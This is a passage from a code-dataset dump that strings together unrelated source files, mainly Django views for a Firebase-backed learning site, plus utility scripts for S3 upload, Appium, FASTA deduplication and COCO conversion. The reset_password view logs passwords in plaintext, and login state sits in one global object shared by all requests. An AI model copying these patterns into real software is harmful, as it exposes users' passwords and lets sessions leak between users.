geba_auth\n\n if user.is_authenticated:\n\n if obj.votes.exists(user.id, action=UP):\n obj.votes.delete(user.id)\n else:\n # upvote the object\n obj.votes.up(user.id)\n\n return url_\n\n\nclass CommentLikeToggleAjax(APIView):\n\n authentication_classes = (authentication.SessionAuthentication, )\n permission_classes = (permissions.IsAuthenticated, )\n\n def get(self, request, pk=None, format=None):\n pk = self.kwargs.get(\"pk\")\n\n # the get_object_or_404 won't work on the reply comments\n # obj = get_object_or_404(Comment, pk=pk)\n obj = Comment.objects.get(pk=pk)\n\n # url_ = obj.get_absolute_url() # get the url of the project post\n user = self.request.user # get the geba_auth\n updated = False\n liked = False\n\n if user.is_authenticated:\n\n if obj.votes.exists(user.id, action=UP):\n obj.votes.delete(user.id)\n liked = False\n else:\n # upvote the object\n obj.votes.up(user.id)\n\n liked = True\n\n updated = True\n\n data = {'updated': updated,\n 'liked': liked}\n\n return Response(data)\n\n\nclass CommentDislikeToggleAjax(APIView):\n\n authentication_classes = (authentication.SessionAuthentication, )\n permission_classes = (permissions.IsAuthenticated, )\n\n def get(self, request, pk=None, format=None):\n # slug = self.kwargs.get(\"slug\")\n pk = self.kwargs.get(\"pk\")\n\n # the get_object_or_404 won't work on the reply comments\n # obj = get_object_or_404(Comment, pk=pk)\n obj = Comment.objects.get(pk=pk)\n\n # url_ = obj.get_absolute_url() # get the url of the project post\n user = self.request.user # get the geba_auth\n updated = False\n disliked = False\n\n if user.is_authenticated:\n\n # check if the geba_auth is authenticated\n # check if the geba_auth has already voted on this object\n if obj.votes.exists(user.id, action=DOWN):\n obj.votes.delete(user.id)\n disliked = False\n else:\n # downvote the object\n obj.votes.down(user.id)\n disliked = True\n\n updated = True\n\n data = {'updated': updated,\n 'disliked': disliked}\n\n return Response(data)","sub_path":"geba_website/apps/comments/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"78604219","text":"import datetime\nfrom django.shortcuts import render, HttpResponse, redirect, HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.http import HttpResponseRedirect\nfrom django.core.cache import cache\nimport traceback,random\n#from AkademiWeb.settings import db, auth, db_storage, DEBUG\nfrom google.cloud import firestore\n\n\n\ndef AnaSayfa(request):\n return render(request, 'Ayarlar.html')\n\ndef girisSayfasi(request):\n if auth.current_user is not None:\n return render(request, 'Anasayfa.html', {})\n else:\n if request.method == 'POST':\n user_email = request.POST['input_KullaniciEmail']\n user_password = request.POST['input_KullaniciSifresi']\n try:\n auth.current_user = auth.sign_in_with_email_and_password(email=user_email, password=user_password)\n logged_user_id = auth.current_user['localId']\n request.session['email'] = auth.current_user['email']\n request.session['id'] = auth.current_user['localId']\n\n user_data = db.collection(u'userData').document(u'{}'.format(logged_user_id)).get()\n user_account_data = user_data.to_dict()\n\n # Kullanıcının mevcut verileri önbelleğe atanır:\n avatar = db_storage.child('Avatar/{}'.format(user_account_data['userAvatar'])).get_url(\"\")\n request.session['avatar'] = avatar\n\n return redirect('anasayfa')\n\n except Exception as error:\n if DEBUG:\n traceback.print_exc()\n return render(request, 'GirisSayfasi.html', {'CVP': 'FALSE'})\n else:\n return render(request, 'GirisSayfasi.html', {})\n\n\ndef anasayfa(request):\n if auth.current_user is not None:\n doc_ref = db.collection(u'userData').document(u'{}'.format(request.session['id'])).get()\n doc = doc_ref.to_dict()\n request.session['username'] = doc['userFullname']\n\n room_a_ref = db.collection(u'userData').document(u'{}'.format(request.session['id'])).collection(\n u'statics').document(u'statics').get()\n lesson_data = room_a_ref.to_dict()\n request.session['lesson'] = lesson_data['complated_lessons']\n\n user_statistics = db.collection(u'userData').document(u'{}'.format(request.session['id'])).collection(\n u'statics').document(u'statics').get()\n user_tutorials = db.collection(u'userData').document(u'{}'.format(request.session['id'])).collection(\n u'tutorials').stream()\n\n user_data = db.collection(u'userData').document(u'{}'.format(request.session['id'])).get()\n user_account_data = user_data.to_dict()\n avatar = db_storage.child('Avatar/{}'.format(user_account_data['userAvatar'])).get_url(\"\")\n\n return render(request, 'Anasayfa.html', {'EgitimData': user_tutorials,'user_data':doc, 'user_stat':user_statistics.to_dict(),'avatar':avatar})\n else:\n if DEBUG:\n traceback.print_exc()\n return redirect('girisSayfasi')\n\n\ndef kullaniciCikis(request):\n if auth.current_user is not None:\n request.session['username'] = None\n request.session['id'] = None\n auth.current_user = None\n return redirect('girisSayfasi')\n else:\n return redirect('girisSayfasi')\n\n\n\ndef forum(request):\n #if auth.current_user is not None:\n\n forum_topics = db.collection(u'Forum').limit(12).get()\n user_ids = []\n for item in forum_topics:\n user_ids.append(item.to_dict()['user'])\n\n forum_avatars = []\n while user_ids:\n commentor_profile = db.collection(u'userData').document(u'{}'.format(user_ids[0])).get()\n commenter_avatar = db_storage.child('Avatar/{}'.format(commentor_profile.to_dict()['userAvatar'])).get_url(\"\")\n forum_avatars.append(commenter_avatar)\n user_ids.pop(0)\n\n forum_data = db.collection(u'Forum').limit(12).get()\n #Tarihe göre çekmesi ayarlanabilir.\n\n return render(request,'Forum.html',{'forum_topic':forum_data,'forum_avatar':forum_avatars})\n #else:\n # return redirect('girisSayfasi')\n\ndef forumIcerik(request,forum_name):\n if auth.current_user is not None:\n commenter = db.collection(u'userData').document(u'{}'.format(auth.current_user['localId'])).get()\n if request.method == 'POST':\n print(\"method Post\")\n yorum = request.POST['yorum']\n try:\n print(\"Try ettim\")\n data = {\n u'detail':yorum,\n u'date':datetime.datetime.now(),\n u'userName':commenter.to_dict()['userFullname'],\n u'user':auth.current_user['localId']\n }\n\n to_comment = db.collection(u'Forum').document(u'{}'.format(forum_name))\n comment = to_comment.collection(u'comments').document()\n comment.set(data)\n\n except Exception as err:\n print(err)\n yorumAvatars = []\n comment_avatars = db.collection(u'Forum').document(u'{}'.format(forum_name)).collection(\n u'comments').order_by('date').get() # yorumları tarihe göre çektik.\n\n for item in comment_avatars:\n commentor_profile = db.collection(u'userData').document(u'{}'.format(item.to_dict()['user'])).get()\n commenter_avatar = db_storage.child('Avatar/{}'.format(commentor_profile.to_dict()['userAvatar'])).get_url(\"\")\n yorumAvatars.append(commenter_avatar)\n\n\n forum_content = db.collection(u'Forum').document(u'{}'.format(forum_name)).collection(\n u'comments').order_by('date').stream()\n\n\n forum_data = db.collection(u'Forum').document(u'{}'.format(forum_name)).get()\n user_data = db.collection(u'userData').document(u'{}'.format(forum_data.to_dict()['user'])).get()\n\n avatar = db_storage.child('Avatar/{}'.format(user_data.to_dict()['userAvatar'])).get_url(\"\") # Konu sahibinin avatarı çekildi.\n\n\n\n context = {'forum_content':forum_content, 'forum_name':forum_name, 'user_data':user_data,\"topic_avatar\":avatar,'forum_data':forum_data,'comment_avatar':yorumAvatars}\n\n return render(request,'ForumContent.html',context)\n else:\n return redirect('girisSayfasi')\n\n\ndef forumYeniKonu(request):\n if auth.current_user is not None:\n if request.method == \"POST\":\n return render(request, 'ForumYeniKonu.html', {})\n else:\n if DEBUG:\n traceback.print_exc()\n return render(request, 'ForumYeniKonu.html', {})\n else:\n return redirect('girisSayfasi')\n\ndef notDefteri(request):\n if auth.current_user is not None:\n return render(request, 'NotDefteri.html', {})\n else:\n return redirect('girisSayfasi')\n\ndef ayarlar(request):\n if auth.current_user is not None:\n data = db.collection(u'userData').document(u'{}'.format(request.session['id'])).get()\n return render(request, 'Ayarlar.html', {'userData':data})\n else:\n return redirect('girisSayfasi')\n\n\ndef kodYaz(request):\n if auth.current_user is not None:\n return render(request, 'KodYaz.html', {})\n else:\n return redirect('girisSayfasi')\n\ndef reset_password(request):\n if auth.current_user is not None:\n\n try:\n\n oldPassword = request.POST['oldPass']\n newPassword = request.POST['newPassword']\n newConfirmPassword = request.POST['con-password']\n\n print('OLD Pass => ' + oldPassword)\n print('NEW Pass =>' + newPassword)\n print('NEW CONFİRM Pass => ' + newConfirmPassword)\n request.session['email'] = ['email']\n request.session['id'] = ['localId']\n return render(request, 'sifreSifirlama.html', {'onay': 'TRUE'})\n except:\n if DEBUG:\n traceback.print_exc()\n return render(request, 'sifreSifirlama.html', {'onay': 'FALSE'})\n else:\n return redirect('girisSayfasi')\n\n\n\ndef other_profiles(request,otherUser):\n if auth.current_user is not None:\n user_data = db.collection(u'userData').document(u'{}'.format(otherUser)).get()\n user_account_data = user_data.to_dict()\n\n\n avatar = db_storage.child('Avatar/{}'.format(otherUser)).get_url(\"\")\n user_statistics = db.collection(u'userData').document(u'{}'.format(otherUser)).collection(u'statics').document(u'statics').get()\n\n room_a_ref = db.collection(u'userData').document(u'{}'.format(otherUser)).collection(\n u'statics').document(u'statics').get()\n lesson_data = room_a_ref.to_dict()\n request.session['lesson'] = lesson_data['complated_lessons']\n\n\n user_tutorials = db.collection(u'userData').document(u'{}'.format(otherUser)).collection(\n u'tutorials').stream()\n\n if request.method == 'POST':\n if 'takipet' in request.POST:\n # OtherUser haricinde kendi bilgilerimizi de update etmeliyiz.\n user_to_follow = db.collection(u'userData').document(u'{}'.format(otherUser))\n\n user_to_follow.update(\n {u'userFollowers': firestore.ArrayUnion([u'{}'.format(auth.current_user['localId'])])})\n\n\n return render(request, 'Anasayfa.html', {'EgitimData':user_tutorials,'user_data':user_account_data, 'user_stat': user_statistics.to_dict(), 'avatar':avatar})\n else:\n return redirect('girisSayfasi')\n\n\n\ndef news(request):\n if auth.current_user is not None:\n news_data = db.collection(u'News').limit(15).stream()\n\n return render(request, 'Bulten.html', {'newsData': news_data})\n else:\n return redirect('girisSayfasi')\n\n\ndef tutorial_dashboard(request):\n #if auth.current_user is not None:\n tutorial_names = db.collection(u'tutorial_data_browser').get()\n\n return render(request, 'Egitimler.html', {'lesson_names':tutorial_names})\n\n #else:\n # return redirect('girisSayfasi')\n\n\n\ndef tutorial_detail(request,lesson_names):\n if auth.current_user is not None:\n global ders_ismi\n ders_ismi = lesson_names\n tutorial_sidebar = db.collection(u'tutorial_data_browser').document(u'{}'.format(ders_ismi)).collection(u'tutorial_lessons4').order_by(u'no').stream()\n\n about_tutorial = db.collection(u'tutorial_data_browser').document(u'{}'.format(ders_ismi)).get()\n\n author_data = db.collection(u'userData').document(u'{}'.format(about_tutorial.to_dict()['Authorid'])).get()\n\n author_avatar = db_storage.child('Avatar/{}'.format(author_data.to_dict()['userAvatar'])).get_url(\"\")\n\n lst = [1,5,10,15,20,25,30,35,40,45,50,55,60,65,70,75,80,85,90,91,92,93,94,95,96,97,98,99,100]\n\n #if ders_ismi == \"BeautifulSoup4\":\n # tutorial_avatar = db.collection(u'v2TutorialData').document(u'Python').get()\n # avatar = db_storage.child('Avatar/{}'.format(tutorial_avatar.to_dict()['lessonAvatar'])).get_url(\"\")\n #else:\n # tutorial_avatar = db.collection(u'v2TutorialData').document(u'{}'.format(ders_ismi)).get()\n # avatar = db_storage.child('Avatar/{}'.format(tutorial_avatar.to_dict()['lessonAvatar'])).get_url(\"\")\n\n context = {'tutorial_lessons': tutorial_sidebar, 'about_tutorial':about_tutorial,'author_avatar':author_avatar,'zorluk':lst}\n\n\n\n return render(request, 'TutorialLesson.html',context)\n else:\n return redirect('girisSayfasi')\n\n\ndef gotoLesson(request,unitsNames):\n if auth.current_user is not None:\n\n tutorial_read_data = db.collection(u'tutorial_data_browser').document(u'{}'.format(ders_ismi)).collection(\n u'tutorial_lessons4').document(u'{}'.format(unitsNames))\n\n tutorial_read_data.update({u'userVisits': firestore.ArrayUnion([u'{}'.format(auth.current_user['localId'])])})\n\n\n tutorial_data = db.collection(u'tutorial_data_browser').document(u'{}'.format(ders_ismi)).collection(\n u'tutorial_lessons4').document(u'{}'.format(unitsNames)).get()\n\n user = db.collection('userData').document(u'{}'.format(auth.current_user['localId'])).get()\n\n if request.method == 'POST':\n yorum = request.POST['yorum']\n try:\n data = {\n u'Yorum':yorum,\n u'Tarih':datetime.datetime.now(),\n u'Yorum_yapan':user.to_dict()['userFullname'],\n u'Yorumid':auth.current_user['localId']\n }\n\n to_comment = db.collection(u'tutorial_data_browser').document(u'{}'.format(ders_ismi))\n comment = to_comment.collection(u'tutorial_lessons4').document(u'{}'.format(unitsNames))\n send_comment = comment.collection(u'Yorumlar').document()\n send_comment.set(data)\n\n except Exception as err:\n print(err)\n\n yorum_liste = []\n yorum_avats = []\n to_comments = db.collection(u'tutorial_data_browser').document(u'{}'.format(ders_ismi))\n comments = to_comments.collection(u'tutorial_lessons4').document(u'{}'.format(unitsNames))\n take_comment = comments.collection(u'Yorumlar').get()\n\n for item in take_comment:\n avatar = db_storage.child('Avatar/{}'.format(item.to_dict()['Yorumid'])).get_url(\"\") # avatarı yansıtamadım..\n yorum_avats.append(avatar)\n yorum_liste.append(item.to_dict())\n\n\n return render(request, 'TutorialDetail.html',{'tutorial_data': tutorial_data,'yorumlar':yorum_liste, 'avatars':yorum_avats})\n\n else:\n return redirect('girisSayfasi')\n\n\ndef books(request):\n if auth.current_user is not None:\n books_data = db.collection('DocumentData').limit(30).stream()\n\n return render(request, 'Kitaplar.html', {'booksData': books_data})\n else:\n return redirect('girisSayfasi')\n\ndef coupons(request):\n if auth.current_user is not None:\n coupons_data = db.collection(\"BountyData\").limit(15).stream()\n return render(request, 'Kupon.html', {\"coupon_data\":coupons_data})\n else:\n return redirect('girisSayfasi')\n\n\n\ndef custom_page_not_found_view(request, exception):\n return render(request, \"404.html\", {})\n\ndef custom_error_view(request, exception=None):\n return render(request, \"500.html\", {})\n","sub_path":"DjangoWeb/AkademiApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"207696293","text":"import os\nimport boto3\nfrom pathlib import Path\nfrom datetime import datetime\nfrom dotenv import load_dotenv\n\n\ndef upload_submission(local_file: str, task: str):\n print(\"Starting submission at {}...\\n\".format(datetime.utcnow()))\n # env info should be in your env file\n BUCKET_NAME = os.getenv(\"BUCKET_NAME\") # you received it in your e-mail\n PARTICIPANT_ID = os.getenv(\"PARTICIPANT_ID\") # you received it in your e-mail\n AWS_ACCESS_KEY = os.getenv(\"AWS_ACCESS_KEY\") # you received it in your e-mail\n AWS_SECRET_KEY = os.getenv(\"AWS_SECRET_KEY\") # you received it in your e-mail\n\n # instantiate boto3 client\n s3_client = boto3.client(\n \"s3\",\n aws_access_key_id=AWS_ACCESS_KEY ,\n aws_secret_access_key=AWS_SECRET_KEY,\n region_name=\"us-west-2\",\n )\n s3_file_name = os.path.basename(local_file)\n s3_file_path = \"{}/{}/{}\".format(task, PARTICIPANT_ID, s3_file_name) # it needs to be like e.g. \"rec/id/*.json\"\n s3_client.upload_file(local_file, BUCKET_NAME, s3_file_path)\n print(\"\\nAll done at {}: see you, space cowboy!\".format(datetime.utcnow()))\n\n\ndef submission(outfile_path: Path, task: str) -> None:\n # load envs from env file\n load_dotenv(verbose=True, dotenv_path=\"upload.env\")\n EMAIL = os.getenv(\"EMAIL\") # the e-mail you used to sign up\n replaced_email = EMAIL.replace(\"@\", \"_\")\n current_datetime_ms = int(datetime.utcnow().timestamp() * 1000)\n parent = outfile_path.parent\n submit_file_path = parent / f\"{replaced_email}_{current_datetime_ms}.json\"\n outfile_path.rename(submit_file_path)\n upload_submission(local_file=str(submit_file_path), task=task)\n","sub_path":"experiments/submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"238111089","text":"# -*- coding: utf-8 -*-\n__author__ = 'Luke'\n\nfrom common.redis_conn import *\nimport json\n\n\ndef CheckAppiumServer(port):\n \"\"\" 查看appium服务\"\"\"\n order = \"netstat -aon| findstr {}\".format(port)\n res = os.system(order)\n return res\n\n\ndef KillAppiumServer():\n \"\"\" 关闭所有appium \"\"\"\n order = \"taskkill /F /IM node.exe /t\"\n os.system(order)\n\n\ndef StartAppiumServer(port):\n \"\"\" 启动appium服务 \"\"\"\n order = \"start appium -p {} \".format(port)\n os.popen(order)\n\n\ndef StartAppiumAdb(server_number):\n \"\"\" 创建appium分配adb端口 \"\"\"\n base_port = 4723\n adb_port = 8200\n if server_number > 200:\n server_number = 200\n KillAppiumServer()\n redis_cache.delete(redis_appium_adb)\n while server_number:\n if CheckAppiumServer(base_port):\n server_number -= 1\n adb_port += 1\n StartAppiumServer(base_port)\n redis_cache.sadd(redis_appium_adb, json.dumps({\"appium\": base_port, \"adb\": adb_port}))\n base_port += 2\n\n\nif __name__ == '__main__':\n StartAppiumAdb(1)\n print(redis_cache.sinter(redis_appium_adb))\n","sub_path":"zalo/zalo_script/common/StartAppiumServer.py","file_name":"StartAppiumServer.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"454620367","text":"import os\nimport json\n\n\nclass FileManager:\n def __init__(self):\n if \"website\" not in os.listdir(os.getcwd()):\n os.mkdir(\"website\")\n if \"indexing\" not in os.listdir(os.getcwd()):\n os.mkdir(\"indexing\")\n if \"other\" not in os.listdir(os.getcwd()):\n os.mkdir(\"other\")\n\n if \"deep_save.json\" not in os.listdir(os.getcwd() + \"\\\\other\"):\n file_save = open(os.getcwd() + \"\\\\other\\\\deep_save.json\", \"w+\")\n file_save.close()\n\n @staticmethod\n def write_indexing(json_dict):\n alphabets_dict = {}\n for i in range(ord('a'), ord('z') + 1):\n alphabets_dict[chr(i)] = {}\n\n for word in json_dict:\n first_letter = word[0]\n if first_letter not in alphabets_dict:\n continue\n alphabets_dict[first_letter][word] = json_dict[word]\n\n new_alphabets_dict = alphabets_dict.copy()\n for letter in alphabets_dict:\n if len(alphabets_dict[letter]) < 200:\n continue\n list_alphabets = list(alphabets_dict[letter])\n word_counter = 0\n index = 0\n for word in list_alphabets:\n letter_index = letter + \"_\" + str(index)\n if letter_index not in new_alphabets_dict:\n new_alphabets_dict[letter_index] = {}\n new_alphabets_dict[letter_index][word] = alphabets_dict[letter][word]\n del(new_alphabets_dict[letter][word])\n word_counter += 1\n if word_counter > 200:\n index += 1\n word_counter = 0\n if len(new_alphabets_dict[letter]) == 0:\n del(new_alphabets_dict[letter])\n alphabets_dict = new_alphabets_dict\n\n for letter in alphabets_dict:\n word_dict = alphabets_dict[letter]\n file_name = \"\\\\indexing\\\\indexing_\" + letter + \".json\"\n file_save = open(os.getcwd() + file_name, \"w+\")\n file_save.write(json.dumps(word_dict, indent=4, sort_keys=True))\n file_save.close()\n\n def read_indexing(self):\n indexing_dict = {}\n for file_name in os.listdir(os.getcwd() + \"\\\\indexing\"):\n file_read = open(os.getcwd() + \"\\\\indexing\\\\\" + file_name, \"r+\")\n indexing_dict.update(json.loads(file_read.read()))\n file_read.close()\n return indexing_dict\n\n def read_deep_save(self):\n file_read = open(os.getcwd() + \"\\\\other\\\\deep_save.json\", \"r+\")\n data = file_read.read()\n file_read.close()\n return data\n\n def write_deep_save(self, data):\n file_write = open(os.getcwd() + \"\\\\other\\\\deep_save.json\", \"w+\")\n file_write.write(data)\n file_write.close()\n\n def list_website_file(self):\n list_data = os.listdir(os.getcwd() + \"\\\\website\")\n return [os.getcwd() + \"\\\\website\\\\\" + data for data in list_data]\n\n def read_website_file(self, model, website):\n file_name = model.website_formatter(website).replace(\".\", \"_\").replace(\"/\", \"#\").replace(\":\", \"$\") + \".json\"\n file_write = open(os.getcwd() + \"\\\\website\\\\\" + file_name, \"r+\")\n data = file_write.read()\n file_write.close()\n return data\n\n def write_website_file(self, model, website, data):\n file_name = model.website_formatter(website).replace(\".\", \"_\").replace(\"/\", \"#\").replace(\":\", \"$\") + \".json\"\n file_write = open(os.getcwd() + \"\\\\website\\\\\" + file_name, \"w+\")\n file_write.write(json.dumps(data, indent=4, sort_keys=True))\n file_write.close()\n\n def delete_indeixng(self):\n file_list = os.listdir(os.getcwd() + \"\\\\indexing\")\n for file_name in file_list:\n os.remove(os.getcwd() + \"\\\\indexing\\\\\" + file_name)\n\n def get_website_deep_list(self):\n file_open = open(os.getcwd() + \"\\\\other\\\\weblist.txt\", \"r+\")\n list_website = []\n for website in file_open:\n list_website.append(website.strip())\n return list_website\n","sub_path":"File_Manager.py","file_name":"File_Manager.py","file_ext":"py","file_size_in_byte":4046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"219194782","text":"#!/usr/bin/env python\n\n#script to reformat green-genes fasta file for UTAX compatibility\n\nimport sys\nfrom Bio import SeqIO\n\ndef dereplicate(input, output):\n seqs = {}\n in_file = open(input, 'rU')\n if input.endswith('.fa') or input.endswith('.fasta'):\n filetype = 'fasta'\n elif input.endswith('.fq') or input.endswith('.fastq'):\n filtype = 'fastq'\n else:\n print(\"Could not detect file type, must be FASTA or FASTQ\")\n sys.exit\n for rec in SeqIO.parse(in_file, filetype):\n sequence = str(rec.seq)\n if sequence not in seqs:\n seqs[sequence] = rec.id\n with open(output, 'w') as out:\n for sequence in seqs:\n out.write('>'+seqs[sequence]+'\\n'+sequence+'\\n')\n\n\ndereplicate(sys.argv[1], sys.argv[2])\n\n\n","sub_path":"util/amptk-derep.py","file_name":"amptk-derep.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"349869403","text":"__author__ = 'Mohammad Yousuf Ali, aliyyousuf@gmail.com, fb.com/aliyyousuf'\n\n\n# Write a function named test_for_anagrams that receives two strings as parameters,\n# both of which consist of alphabetic characters and returns True if the two strings\n# are anagrams, False otherwise. Two strings are anagrams if one string can be constructed\n# by rearranging the characters in the other string using all the characters in the\n# original string exactly once. For example, the strings \"Orchestra\" and \"Carthorse\"\n# are anagrams because each one can be constructed by rearranging the characters in the\n# other one using all the characters in one of them exactly once.\n# Note that capitalization does not matter here i.e. a lower case character can be\n# considered the same as an upper case character\n\n\ndef test_for_anagrams(s1,s2):\n s1,s2 = s1.lower(),s2.lower()\n D,D2 = {},{}\n for char in s1:\n D[char] = s1.count(char)\n for char in s2:\n D2[char] = s2.count(char)\n mis_match = 0\n for k,v in D.items():\n try:\n if D[k] != D2[k]:\n mis_match += 1\n except KeyError:\n return False\n\n if not mis_match and len(D) == len(D2):\n return True\n else:\n return False\n\n\nprint(test_for_anagrams('hello','hallo'))","sub_path":"UTAx-CSE1309X/Q4P4.py","file_name":"Q4P4.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"298472583","text":"import sys\r\nimport os\r\nimport csv\r\nimport numpy as np\r\nimport json\r\nfrom tqdm import tqdm\r\ncsv.field_size_limit(sys.maxsize)\r\ndef rle2bbox(rle, shape):\r\n '''\r\n from: https://www.kaggle.com/eigrad/convert-rle-to-bounding-box-x0-y0-x1-y1\r\n rle: run-length encoded image mask, as string\r\n shape: (height, width) of image on which RLE was produced\r\n Returns (x0, y0, x1, y1) tuple describing the bounding box of the rle mask\r\n\r\n Note on image vs np.array dimensions:\r\n\r\n np.array implies the `[y, x]` indexing order in terms of image dimensions,\r\n so the variable on `shape[0]` is `y`, and the variable on the `shape[1]` is `x`,\r\n hence the result would be correct (x0,y0,x1,y1) in terms of image dimensions\r\n for RLE-encoded indices of np.array (which are produced by widely used kernels\r\n and are used in most kaggle competitions datasets)\r\n '''\r\n\r\n a = np.fromiter(rle.split(), dtype=np.uint)\r\n a = a.reshape((-1, 2)) # an array of (start, length) pairs\r\n a[:, 0] -= 1 # `start` is 1-indexed\r\n\r\n y0 = a[:, 0] % shape[0]\r\n y1 = y0 + a[:, 1]\r\n if np.any(y1 > shape[0]):\r\n # got `y` overrun, meaning that there are a pixels in mask on 0 and shape[0] position\r\n y0 = 0\r\n y1 = shape[0]\r\n else:\r\n y0 = np.min(y0)\r\n y1 = np.max(y1)\r\n\r\n x0 = a[:, 0] // shape[0]\r\n x1 = (a[:, 0] + a[:, 1]) // shape[0]\r\n x0 = np.min(x0)\r\n x1 = np.max(x1)\r\n\r\n if x1 > shape[1]:\r\n # just went out of the image dimensions\r\n raise ValueError(\"invalid RLE or image dimensions: x1=%d > shape[1]=%d\" % (\r\n x1, shape[1]\r\n ))\r\n\r\n return [int(x0), int(y0), int(x1-x0+1), int(y1-y0+1)] #json does not recognize NumPy data types --> converted to int\r\n\r\n\r\ndef convert_annotations_detection_train(path_to_annotaion_file, path_to_categories, path_to_output_dir = \"./data/imaterialist2/\"):\r\n assert os.path.exists(path_to_output_dir)\r\n assert os.path.exists(path_to_categories)\r\n with open(path_to_categories, \"r+\") as labeljson:\r\n label_desc = json.load(labeljson)\r\n\r\n label_desc = label_desc[\"categories\"]\r\n\r\n assert os.path.exists(path_to_annotaion_file)\r\n train_images = []\r\n test_images = []\r\n image_name_to_id_dict = {}\r\n mask_id_to_encoded_pix = {}\r\n\r\n mask_id_to_attributes = {}\r\n train_annotations = []\r\n test_annotations = []\r\n one_nth_portion = 5\r\n with open(path_to_annotaion_file, \"r+\") as traincsv:\r\n datareader = csv.reader(traincsv)#original csv from kaggle\r\n # row includes [0:'ImageId', 1:'EncodedPixels', 2:'Height', 3:'Width', 4:'ClassId', 5:'AttributesIds']\r\n next(datareader)#ignoring the header\r\n mask_id = 0\r\n img_id =0\r\n for row in tqdm(datareader):\r\n mask_id+=1\r\n\r\n image_dict = {}\r\n image_dict[\"file_name\"] = row[0] + \".jpg\"\r\n image_dict[\"height\"] = int(row[2])\r\n image_dict[\"width\"] = int(row[3])\r\n\r\n if row[0] not in image_name_to_id_dict: #if file name not in dict then add to dict and increase the counter\r\n img_id += 1\r\n image_dict[\"id\"] = img_id\r\n if image_dict[\"id\"] % one_nth_portion == 0:\r\n train_images.append(image_dict)\r\n else:\r\n test_images.append(image_dict)\r\n image_name_to_id_dict[row[0]] = img_id\r\n\r\n else:\r\n image_dict[\"id\"] = image_name_to_id_dict[row[0]]\r\n\r\n #storing masks\r\n mask_id_to_encoded_pix[str(mask_id)] = row[1]\r\n\r\n #storing attributes\r\n mask_id_to_attributes[str(mask_id)] = row[-1]\r\n\r\n annot_dict = {}\r\n bbox= rle2bbox(row[1],(image_dict[\"height\"],image_dict[\"width\"]))\r\n area = bbox[-1]*bbox[-2] #w*h\r\n annot_dict[\"area\"] = area\r\n annot_dict[\"bbox\"] = bbox\r\n annot_dict[\"category_id\"] = int(row[4])\r\n annot_dict[\"id\"] = mask_id\r\n annot_dict[\"image_id\"] = image_dict[\"id\"]\r\n annot_dict[\"iscrowd\"] = 0\r\n\r\n if image_dict[\"id\"] % one_nth_portion == 0:\r\n test_annotations.append(annot_dict)\r\n else:\r\n train_annotations.append(annot_dict)\r\n\r\n #with open(path_to_output_dir + \"image_name_to_id_dict.json\",\"w+\") as imgtoid:\r\n # json.dump(image_name_to_id_dict,imgtoid)\r\n #with open(path_to_output_dir + \"mask_id_to_encoded_pix.json\",\"w+\") as f:\r\n # json.dump(mask_id_to_encoded_pix,f)\r\n #with open(path_to_output_dir + \"mask_id_to_attributes.json\",\"w+\") as f:\r\n # json.dump(mask_id_to_attributes,f)\r\n #with open(path_to_output_dir + \"train_detections.json\",\"w+\") as dettrain:\r\n # json.dump({\"images\": train_images, \"annotations\": train_annotations, \"categories\": label_desc},dettrain)\r\n #with open(path_to_output_dir + \"test_detections.json\",\"w+\") as dettrain:\r\n # json.dump({\"images\": test_images, \"annotations\": test_annotations, \"categories\": label_desc},dettrain)\r\n pass\r\n\r\nif __name__ == \"__main__\":\r\n\r\n convert_annotations_detection_train(sys.argv[1],sys.argv[2] )","sub_path":"Convert_Annotation.py","file_name":"Convert_Annotation.py","file_ext":"py","file_size_in_byte":5185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"634660398","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated Jun 26 2017\n\n@author: Thatyana Morales\n\nDependant on Classifier_Algorithms_OneUser_NoCommand, this script handles everything involving\nprinting the data to the CSV files as well as ROC calculations and ROC curve\nplots. \n\nNote: This file and Classifier_Algorithms_OneUser_NoCommand is not run on the\ncommand line. The Classifier_Algorithms_OneUser_NoCommand is to be run directly\nfrom the IDE. \n\n\"\"\"\n\nimport matplotlib.pyplot as plt\nfrom itertools import cycle\nfrom sklearn.metrics import roc_curve, auc\nfrom scipy import interp\nimport numpy as np\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import accuracy_score\n\nfrom Classifier_Algorithms_OneUser_NoCommand import kf, classifications, features\nimport relabelGestureSet as relabel\n\n\n\n\n# This function is used to convert the allClassifications and allPredictions\n# array to a y x n array with the gestures binarized\ndef matrix(y, n):\n np.set_printoptions(threshold='nan')\n m = np.zeros((len(y), n), dtype=np.int)\n for x in range(len(y)):\n m[x][int(y[x])] = 1 \n return (m)\n\n# Plots all ROC curves. This function is optionally called\ndef plotRoc(tpr, fpr, roc_auc, n_classes):\n \n plt.figure()\n lw = 2\n plt.plot(fpr[\"micro\"], tpr[\"micro\"],\n label='Micro-Avg ROC (area = {0:0.6f})'\n ''.format(roc_auc[\"micro\"]),\n color='deeppink', linestyle=':', linewidth=4)\n \n plt.plot(fpr[\"macro\"], tpr[\"macro\"],\n label='Macro-Avg ROC (area = {0:0.6f})'\n ''.format(roc_auc[\"macro\"]),\n color='navy', linestyle=':', linewidth=4)\n \n colors = cycle(['red', 'orange', 'yellow', 'green', 'blue',\n 'indigo', 'violet', 'gray', 'black', 'fuchsia',\n 'cadetblue', 'orchid', 'seagreen', 'olive', 'darkgoldenrod',\n 'tomato', 'sienna', 'lightskyblue', 'peru', 'sandybrown'])\n for i, color in zip(range(n_classes), colors):\n plt.plot(fpr[i], tpr[i], color=color, lw=lw,\n label='Class 